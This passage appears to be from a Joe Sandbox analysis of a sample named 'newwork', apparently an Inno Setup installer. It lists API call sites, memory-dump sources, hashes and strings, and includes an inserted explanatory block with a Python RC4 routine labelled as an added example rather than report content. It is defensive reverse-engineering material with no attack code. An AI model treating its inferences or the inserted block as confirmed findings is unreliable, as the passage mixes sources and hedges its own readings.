• Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
• Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
• Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
• Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
APIs
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CaptureIconic
• String ID:
• API String ID: 2277910766-0
• Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
• Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
• Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
• Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
APIs
• IsIconic.USER32(?), ref: 0042419B
  • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
  • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
  • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
  • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
• SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Window$ActiveEnumIconicLongShowWindows
• String ID:
• API String ID: 2671590913-0
• Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
• Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
• Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
• Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
• Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
• Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
• Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
• Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
• Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
• Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
APIs
• ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
• Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
• Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
• Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
APIs
• ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
• Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
• Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
• Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
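The two ArcFourCrypt._ISCRYPT call sites above resolve to the ArcFourCrypt export of Inno Setup's ISCrypt.dll, which is a plain RC4 (ARC4) routine operating on a caller-supplied context; the second call, with null input and output pointers and a length of 0x3E8 (1000), is consistent with the keystream-discard step Inno Setup performs after keying, though the report itself does not say so and that reading is an assumption. The following RC4 implementation is an added example for analysts who need to reproduce the transformation on a buffer handed to this API; it is not code from the report, from Joe Sandbox, or from the sample, and the key and message it uses are constructed test data (the published RC4 test vectors), not values recovered from the binary.

```python
"""RC4 (ARC4) with a persistent context, mirroring the shape of a C-style
ArcFourCrypt(ctx, in, out, len) call. Added example; the key and message
in __main__ are constructed test data, not values from the sample."""


def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: derive the 256-byte permutation S from key."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


class RC4Context:
    """Mutable cipher state. Successive crypt() calls continue the same
    keystream, which is how a context object passed by pointer behaves
    across several ArcFourCrypt-style calls."""

    def __init__(self, key: bytes, discard: int = 0):
        self.s = rc4_ksa(key)
        self.i = 0
        self.j = 0
        # RC4-drop: consume and throw away the first `discard` keystream
        # bytes. A null-buffer call with length 1000 would correspond to
        # discard=1000 (assumption about the second call site, see lead-in).
        self.keystream(discard)

    def keystream(self, n: int) -> bytes:
        """Pseudo-random generation algorithm: emit the next n keystream bytes."""
        out = bytearray()
        s = self.s
        for _ in range(n):
            self.i = (self.i + 1) & 0xFF
            self.j = (self.j + s[self.i]) & 0xFF
            s[self.i], s[self.j] = s[self.j], s[self.i]
            out.append(s[(s[self.i] + s[self.j]) & 0xFF])
        return bytes(out)

    def crypt(self, data: bytes) -> bytes:
        """XOR data with keystream; encryption and decryption are the same operation."""
        return bytes(a ^ b for a, b in zip(data, self.keystream(len(data))))


def rc4(key: bytes, data: bytes, discard: int = 0) -> bytes:
    """One-shot helper: fresh context, optional keystream drop, then transform."""
    return RC4Context(key, discard).crypt(data)


if __name__ == "__main__":
    # Constructed test vector, not data from the sample binary.
    key = b"Key"
    msg = b"Plaintext"
    ct = rc4(key, msg)
    print(ct.hex())  # bbf316e8d940af0ad3
    assert rc4(key, ct) == msg  # symmetric: same call decrypts
```

Because RC4 is a stream cipher, feeding a recovered ciphertext buffer and the same key into `rc4()` yields the plaintext; if the sample's keying routine drops leading keystream bytes, pass that count as `discard`, otherwise the output will be garbage from the first byte.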
Memory Dump Source
• Source File: 00000001.00000002.3557695338.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.3557663419.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.3557723561.0000000010002000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_newwork.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
• Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
Memory Dump Source
• Source File: 00000001.00000002.3557695338.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.3557663419.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.3557723561.0000000010002000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_newwork.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
• Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction Fuzzy Hash:
APIs
  • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
• GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
• GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
• GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
• GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
• GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
• GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
• GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
• GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
• GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
• GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
• GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
• GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
• GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
• GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
• GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
• GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
• GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
• GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
• GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
• GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
• GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
• GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
• GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
• GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
• GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
• GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
• GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
• GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
• GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
• GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
• GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
• GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
• GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
• GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
• GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
• GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
• GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
• GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
• GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
• API String ID: 1968650500-2910565190
• Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
• Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
• Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
• Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
APIs
• GetDC.USER32(00000000), ref: 0041CA40
• CreateCompatibleDC.GDI32(?), ref: 0041CA4C
• CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
• CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
• SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
• FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
• SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
• SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
• PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
• CreateCompatibleDC.GDI32(?), ref: 0041CB2B
• SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
• RealizePalette.GDI32(00000000), ref: 0041CB7D
• SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
• RealizePalette.GDI32(0041CE3C), ref: 0041CB95
• SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
• SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
• BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
• SelectObject.GDI32(00000000,?), ref: 0041CBEE
• DeleteDC.GDI32(00000000), ref: 0041CC04
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
• String ID:
• API String ID: 269503290-0
• Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
• Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
• Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
• Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
APIs
• CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
• CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
• SysFreeString.OLEAUT32(00000000), ref: 0045685B
Strings
• IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
• IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
• CoCreateInstance, xrefs: 004566AF
• IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
• %ProgramFiles(x86)%\, xrefs: 0045672E
• IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
• IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
• IPersistFile::Save, xrefs: 00456962
• {pf32}\, xrefs: 0045671E
• IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
• IPropertyStore::Commit, xrefs: 004568E3
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CreateInstance$FreeString
• String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
• API String ID: 308859552-2363233914
• Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
• Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
• Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
• Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
APIs
• ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
• CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
• ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
• ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
• String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
• API String ID: 2000705611-3672972446
• Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
• Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
• Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
• Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
APIs
• GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
Strings
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ErrorLast
• String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
• API String ID: 1452528299-3112430753
• Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
• Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
• Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
• Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                        • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                        • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                          • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
